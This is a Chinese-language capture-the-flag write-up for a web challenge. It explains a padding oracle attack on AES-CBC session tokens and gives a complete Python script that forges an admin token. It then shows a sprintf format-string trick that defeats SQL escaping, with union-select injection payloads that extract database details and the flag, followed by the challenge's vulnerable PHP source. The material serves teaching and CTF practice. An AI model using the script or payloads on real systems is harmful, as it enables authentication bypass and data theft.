http://111.231.111.54/
泄露了兩個源碼
.login.php.swp .admin.php.swp 源碼丟在最下面凸舵,可用vim -r恢復(fù)
第一次接觸padding oracle淑廊,這題能做出來吐咳,真的是要感謝我的朋友Pr0ph3t給我的指點(diǎn)
結(jié)合這道題井赌,講解一下padding oracle的攻擊方式
題目大概是這樣的邏輯:
函數(shù)一:get_identity()
只有當(dāng)你以一個賬號密碼成功登陸后个从,才會進(jìn)入get_identity()颁督,此時會生成一個隨機(jī)的token爸舒,然后采用aes-128-cbc的加密方式,用這個隨機(jī)生成的token和密鑰祥国,循環(huán)加密生成一個$id昵观,如果生成的$id=admin,那你就有session['isadmin']舌稀,所以用隨機(jī)token啊犬,加密得到admin這個id的概率是非常小的,所以基本上所有用賬號密碼的用戶登陸都是guest
那管理員怎么登陸呢壁查?對了觉至,他不用賬號密碼,用一個特定的token來登陸睡腿,就是下面的函數(shù) test_identity()
管理員直接傳個特定的token语御,然后就會被后端的密鑰解密,一解密得到的 id 就是admin席怪,就認(rèn)證成功了应闯。
這個特定的token其實(shí)很容易得到,直接用密鑰和admin這個id挂捻,解密即可生成
但是如果我們不知道密鑰碉纺,那就需要用padding oracle攻擊,來得到這個管理員特定的token刻撒,詳細(xì)的原理可參考以下鏈接
http://f1sh.site/2017/08/04/%E5%88%9D%E5%AD%A6padding-oracle-attack/
http://www.reibang.com/p/ad8bdd87e131
這里只講解攻擊方式和大致原理:
不斷用admin和admin去登陸骨田,得到很多token,記住這里的admin声怔,admin不是管理員态贤,可以把它認(rèn)為是一個很普通的賬號,真正的管理員是用token登陸的醋火,這個邏輯當(dāng)時納悶了我好久悠汽。。芥驳。介粘。
-
用登陸得到的很多token,模仿管理員直接用這些token去訪問admin.php晚树,那么就會進(jìn)入test_identity()函數(shù)姻采,進(jìn)行解密操作,這時候的解密,其實(shí)就是將middle和IV(token) 逐位異或慨亲,如果能符合padding規(guī)則婚瓜,就會生成一個明文,然后拿這個明文hex解碼看看是不是admin這個id刑棵,是的話就認(rèn)證成功巴刻,不是的話就認(rèn)證失敗
image.png 所以,如果padding失敗蛉签,服務(wù)器就會返回500錯誤和error!胡陪,原因是這個解密函數(shù)解密出錯,我們不斷獲取token去進(jìn)行padding oracle攻擊碍舍,直到后端可以正常解密出一個明文柠座,并且不會報錯,即使它不是admin片橡,這時候我們就能得到middle的值
我們拿middle妈经,去和admin這個id異或,就生成了admin的tokenE跏椤4蹬荨!
-
或者我們可以隨便拿一個admin,admin登陸獲得的舊token经瓷,然后和middle異或爆哑,得到它的明文(id),然后
舊token ^ 舊id ^ admin(新id) = 新IV (admin的token)數(shù)學(xué)推導(dǎo)如下
image.png
其實(shí)這也就是CBC翻轉(zhuǎn)的原理舆吮,有時候你知道你的token和解密后對應(yīng)的明文id泪漂,你就能把這兩個與admin這個id 三者異或,就能得到admin的token歪泳,可參考該文章
http://www.reibang.com/p/7f171477a603 Padding Oracle Attack的關(guān)鍵在于:
- 攻擊者能夠獲知并修改IV
- 攻擊者能夠獲知解密的結(jié)果是否符合padding,如服務(wù)器是否報錯
- 至此廢話完了露筒,一口氣敲完的呐伞,若寫錯了請指正,Orz
獻(xiàn)上腳本慎式,修改自 http://blog.csdn.net/qq_19876131/article/details/61918399
#coding:utf8
import requests
import base64
url='http://111.231.111.54/login.php'
N=16
old_token = 'eHNkaHkxSkxQbEplanFKbQ=='
def inject_token(token):
header={"Cookie":"PHPSESSID=qv6iuvrs0bh3g3c0688ss2cb86;token="+token}
print header
result=requests.get(url,headers=header)
return result
def xor(a, b):
return "".join([chr(ord(a[i])^ord(b[i%len(b)])) for i in xrange(len(a))])
def pad(string,N):
l=len(string)
if l!=N:
return string+chr(N-l)*(N-l)
def padding_oracle(N):
get=""
for i in xrange(1,N+1):
for j in xrange(0,256):
padding=xor(get,chr(i)*(i-1))
c=chr(0)*(16-i)+chr(j)+padding
result=inject_token(base64.b64encode(c))
print result.content
if "Error!" not in result.content:
get=chr(j^i)+get
break
return get
while 1:
middle1=padding_oracle(N)
print "\n"
if(len(middle1)+1==16):
for i in xrange(0,256):
middle=chr(i)+middle1
print "token:"+old_token
print "middle:"+middle
plaintext=xor(middle,old_token);
print "plaintext:"+plaintext
des=pad('admin',N)
tmp=""
print des.encode("base64")
for i in xrange(16):
tmp+=chr(ord(old_token[i])^ord(plaintext[i])^ord(des[i]))
print tmp.encode('base64')
result=inject_token(base64.b64encode(tmp))
if "admin" in result.content:
print result.content
print "success"
exit()
成功以管理員身份伶氢,登陸admin.php,并可以傳入?yún)?shù)id和title
乍看這兩個參數(shù)都是做了預(yù)處理瘪吏,再帶入sql語句查詢
但是看到sprintf()癣防,是一個格式化字符串函數(shù),傳入的字符可覆蓋自身參數(shù)
可參考文章
https://paper.seebug.org/386/
http://www.cnblogs.com/test404/p/7821884.html
https://www.seceye.cn/1291.html
當(dāng)我們傳入 id=3&title=%1$ 'or(1)#
這時候掌眠,因為后端將 '轉(zhuǎn)譯成 \' 形成id=3&title=%1$ \'or(1)#
由于sprintf()的作用蕾盯,會吞掉$后面的兩個字節(jié),也就是 空格和\蓝丙,導(dǎo)致單引號逃逸成功级遭,不會被轉(zhuǎn)譯
所以這里就能成功注入了望拖,而且可以union注入,記得對payload進(jìn)行url編碼挫鸽,畢竟太多亂七八糟的符號
給出相關(guān)payload(未url編碼)和截圖
id=3&title=%1$ 'union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version(),@@hostname,@@datadir)#
id=3&title=%1$ 'union select 1,2,group_concat(distinct(table_name)) from information_schema.tables where table_schema=0x77656231#
id=3&title=%1$ 'union select 1,2,group_concat(distinct(column_name)) from information_schema.columns where table_name=0x6b6579 and table_schema=0x77656231#
id=3&title=%1$ 'union select 1,2,group_concat(distinct(f14g)) from web1.key#
后端源碼
login.php
<?php
error_reporting(0);
session_start();
define("METHOD", "aes-128-cbc");
include('config.php');
function show_page(){
echo '省略';
}
function get_random_token(){
$random_token = '';
$str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890";
for($i = 0; $i < 16; $i++){
$random_token .= substr($str, rand(1, 61), 1);
}
return $random_token;
}
function get_identity(){
global $id;
$token = get_random_token();
$c = openssl_encrypt($id, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $token);
$_SESSION['id'] = base64_encode($c);
setcookie("token", base64_encode($token));
if($id === 'admin'){
$_SESSION['isadmin'] = 1;
}else{
$_SESSION['isadmin'] = 0;
}
}
function test_identity(){
if (isset($_SESSION['id'])) {
$c = base64_decode($_SESSION['id']);
$token = base64_decode($_COOKIE["token"]);
if($u = openssl_decrypt($c, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $token)){
if ($u === 'admin') {
$_SESSION['isadmin'] = 1;
return 1;
}
}else{
die("Error!");
}
}
return 0;
}
if(isset($_POST['username'])&&isset($_POST['password'])){
$username = mysql_real_escape_string($_POST['username']);
$password = $_POST['password'];
$result = mysql_query("select password from users where username='" . $username . "'", $con);
$row = mysql_fetch_array($result);
if($row['password'] === md5($password)){
get_identity();
header('location: ./admin.php');
}else{
die('Login failed.');
}
}else{
if(test_identity()){
header('location: ./admin.php');
}else{
show_page();
}
}
?>
admin.php
<?php
error_reporting(0);
session_start();
include('config.php');
if(!$_SESSION['isadmin']){
die('You are not admin');
}
if(isset($_GET['id'])){
$id = mysql_real_escape_string($_GET['id']);
if(isset($_GET['title'])){
$title = mysql_real_escape_string($_GET['title']);
$title = sprintf("AND title='%s'", $title);
}else{
$title = '';
}
$sql = sprintf("SELECT * FROM article WHERE id='%s' $title", $id);
$result = mysql_query($sql,$con);
$row = mysql_fetch_array($result);
if(isset($row['title'])&&isset($row['content'])){
echo "<h1>".$row['title']."</h1><br>".$row['content'];
die();
}else{
die("This article does not exist.");
}
}
?>
